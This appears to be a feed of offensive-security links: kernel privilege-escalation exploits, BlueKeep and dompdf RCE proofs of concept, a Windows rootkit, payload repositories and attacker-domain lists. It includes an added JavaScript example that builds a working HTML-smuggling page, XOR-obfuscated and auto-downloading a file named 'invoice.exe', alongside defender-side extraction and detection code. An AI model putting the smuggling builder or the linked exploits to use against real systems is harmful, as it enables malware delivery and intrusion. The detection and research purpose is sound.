An unexpected Redis sandbox escape affecting only Debian, Ubuntu, and other derivatives
https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
A newly discovered #vulnerability (CVE-2022-25636) in the Netfilter #firewall module of the #Linux kernel could be exploited to gain root privileges on vulnerable systems, escape containers, or cause a kernel panic.
https://github.com/Bonfee/CVE-2022-25636
RCE exploit for dompdf
https://positive.security/blog/dompdf-rce
https://github.com/positive-security/dompdf-rce
From XSS to RCE (dompdf 0day) | Positive Security
Using a still unpatched vulnerability in the PHP library dompdf (used for rendering PDFs from HTML), we achieved RCE on a web server with merely a reflected XSS vulnerability as entry point.
CVE-2022-0337: system environment variables leak in Google Chrome, Microsoft Edge and Opera (reported by Maciej Pulikowski; rated P1, $10,000 bounty)
https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera
Top Search Engines for Cyber Security ⚡️📜
1️⃣http://censys.io – Censys Search Engine
2️⃣http://shodan.io – Search engine for Internet-connected devices
3️⃣http://viz.greynoise.io – GreyNoise Visualizer
4️⃣http://zoomeye.org – Cyberspace Search Engine
5️⃣http://onyphe.io – Cyber Defense Search Engine
6️⃣http://wigle.net – Wireless Network Mapping
7️⃣http://intelx.io – Intelligence X
8️⃣http://fofa.so – Cyberspace Security Search Engine
9️⃣http://hunter.io – OSINT Search Engine
🔟http://zorexeye.com – Hacker’s Search Engine
https://twitter.com/HackerGautam/status/1506932786435100674?s=20&t=ZF5EObm8IZSuBqzRZU1sJA
AutoSmuggle: utility to craft HTML or SVG smuggled files for Red Team engagements
https://github.com/surajpkhetani/AutoSmuggle
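To show what a "smuggled" HTML file actually does, here is an added example; it is not AutoSmuggle's code, and the function names, the XOR key scheme and the sample payload are this editor's own constructions. The attacker side assembles a carrier page that rebuilds the file client-side from an embedded base64 string, so a web proxy or mail gateway only ever sees an HTML document; the defender side recovers the embedded file from such a page and applies a cheap triage heuristic of the kind a sandbox or gateway analyst would write.

```javascript
// Added example (not AutoSmuggle's code). Shows the mechanics of HTML smuggling:
// the carrier page holds the file as an obfuscated base64 string and rebuilds it
// client-side with a Blob and an <a download> click, so the proxy only ever sees
// an HTML document. Function names, the XOR key scheme and the sample payload
// below are this editor's own constructions. Builder/extractor run under Node.js;
// the generated page itself runs in a browser.

// Light XOR obfuscation so the raw payload bytes never appear verbatim in the HTML.
function xorBytes(bytes, key) {
  const out = Buffer.alloc(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ key[i % key.length];
  return out;
}

// Attacker side: assemble the carrier page around the payload.
function buildSmuggledHtml(payload, fileName, key) {
  const dataB64 = xorBytes(Buffer.from(payload), key).toString('base64');
  const keyB64 = Buffer.from(key).toString('base64');
  // Everything the browser needs is inline; no second request is made.
  return `<!DOCTYPE html>
<html><body>
<script>
  const data = "${dataB64}";
  const key = Uint8Array.from(atob("${keyB64}"), c => c.charCodeAt(0));
  const raw = Uint8Array.from(atob(data), c => c.charCodeAt(0));
  const bytes = raw.map((b, i) => b ^ key[i % key.length]);
  const blob = new Blob([bytes], { type: "application/octet-stream" });
  const a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = ${JSON.stringify(fileName)};
  a.click();
</script>
</body></html>`;
}

// Defender side: recover the embedded file from a page built by buildSmuggledHtml
// (the regexes match that template; a real analysis script has to follow whatever
// decode routine the sample uses). Returns null if nothing is found.
function extractSmuggledPayload(html) {
  const data = /const data = "([A-Za-z0-9+/=]*)"/.exec(html);
  const key = /atob\("([A-Za-z0-9+/=]*)"\)/.exec(html);
  if (!data || !key) return null;
  return xorBytes(Buffer.from(data[1], 'base64'), Buffer.from(key[1], 'base64'));
}

// Defender side: cheap triage heuristic. A page that decodes data, wraps it in a
// Blob/object URL and then triggers a download (or the legacy IE/Edge
// msSaveOrOpenBlob) is worth a second look; benign pages rarely do all three.
function looksLikeHtmlSmuggling(html) {
  const decodes = /\batob\s*\(|Uint8Array\.from\s*\(/.test(html);
  const builds = /new\s+Blob\s*\(|createObjectURL\s*\(/.test(html);
  const drops = /\.download\s*=|msSaveOrOpenBlob|msSaveBlob/.test(html);
  return decodes && builds && drops;
}

// Constructed sample: a fake "executable" (MZ header plus filler), never real malware.
const SAMPLE_PAYLOAD = Buffer.from('MZ\x90\x00 constructed test payload, not a real binary');
const SAMPLE_KEY = Buffer.from('k3y!');

// Build a carrier page, then check it from the defender's side.
function demo() {
  const html = buildSmuggledHtml(SAMPLE_PAYLOAD, 'invoice.exe', SAMPLE_KEY);
  const recovered = extractSmuggledPayload(html);
  return {
    flagged: looksLikeHtmlSmuggling(html),
    roundTrips: recovered !== null && recovered.equals(SAMPLE_PAYLOAD),
    rawVisible: html.includes(SAMPLE_PAYLOAD.toString('base64')),
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

The heuristic is deliberately loose (it fires on any page that decodes, builds a Blob and forces a download); in practice you would pair it with the reconstructed file's type and hash rather than block on the HTML pattern alone, since AutoSmuggle-style tools can vary the decode routine and split the string across elements.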
Cronos is a Windows 10/11 x64 ring 0 rootkit. It can hide processes and protect and elevate them via token manipulation.
https://github.com/XaFF-XaFF/Cronos-Rootkit
DLLirant is a tool to automate DLL hijacking research on a specified binary.
https://github.com/Sh0ckFR/DLLirant
CVE-2022-0995 LPE exploit targeting Ubuntu 21.10 with kernel 5.13.0-37.
https://github.com/Bonfee/CVE-2022-0995
This is my exploit for CVE-2022-0995, a heap out-of-bounds write in the watch_queue Linux kernel component. It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html.
CVE-2019-0708 (BlueKeep) proof of concept allowing pre-auth RCE on Windows 7
https://github.com/RICSecLab/CVE-2019-0708
https://lots-project.com/
Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites on the site allows attackers to use their domain or subdomain. Website design credits: LOLBAS & GTFOBins.
https://filesec.io/
Stay up-to-date with the latest file extensions being used by attackers.
https://malapi.io/
Malware API
All three sites are by mr.d0x: https://twitter.com/mrd0x
This is the exploit for CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10. Our preliminary experiment shows this vulnerability affects the latest Ubuntu, Fedora, and Debian. Our exploit was built to attack Ubuntu Desktop 21.10.
https://github.com/plummm/CVE-2022-27666
#LPE
App vulnerable to #Spring4shell:
https://github.com/jbaines-r7/spring4shell_vulnapp
Exploit:
https://news.1rj.ru/str/Peneter_Tools/274
Additional explanation:
https://news.1rj.ru/str/learnpentest/513
Spring4shell scanners:
https://github.com/jfrog/jfrog-spring-tools
https://github.com/hillu/local-spring-vuln-scanner
Tools and PoCs for Windows syscall investigation.
https://github.com/daem0nc0re/AtomicSyscall#syscalldumper
EventPipe - An IPC method to transfer binary data between processes using event objects
https://www.x86matthew.com/view_post?id=eventpipe
14 Payload Repositories to find all the required Payloads & Attack Vectors.
https://twitter.com/harshbothra_/status/1509870706347032579?s=20
Payloads All The Things
1. https://github.com/swisskyrepo/PayloadsAllTheThings
2. https://github.com/payloadbox/
3. https://github.com/s0md3v/AwesomeXSS
4. https://github.com/0xInfection/Awesome-WAF
5. https://github.com/omurugur/SQL_Injection_Payload
6. https://github.com/Muhammd/Awesome-Payloads
7. https://github.com/foospidy/payloads
8. https://github.com/1N3/IntruderPayloads
9. https://github.com/pgaijin66/XSS-Payloads
10. https://github.com/terjanq/Tiny-XSS-Payloads
11. https://github.com/chinarulezzz/pixload
12. https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
13. https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
14. https://github.com/danielmiessler/SecLists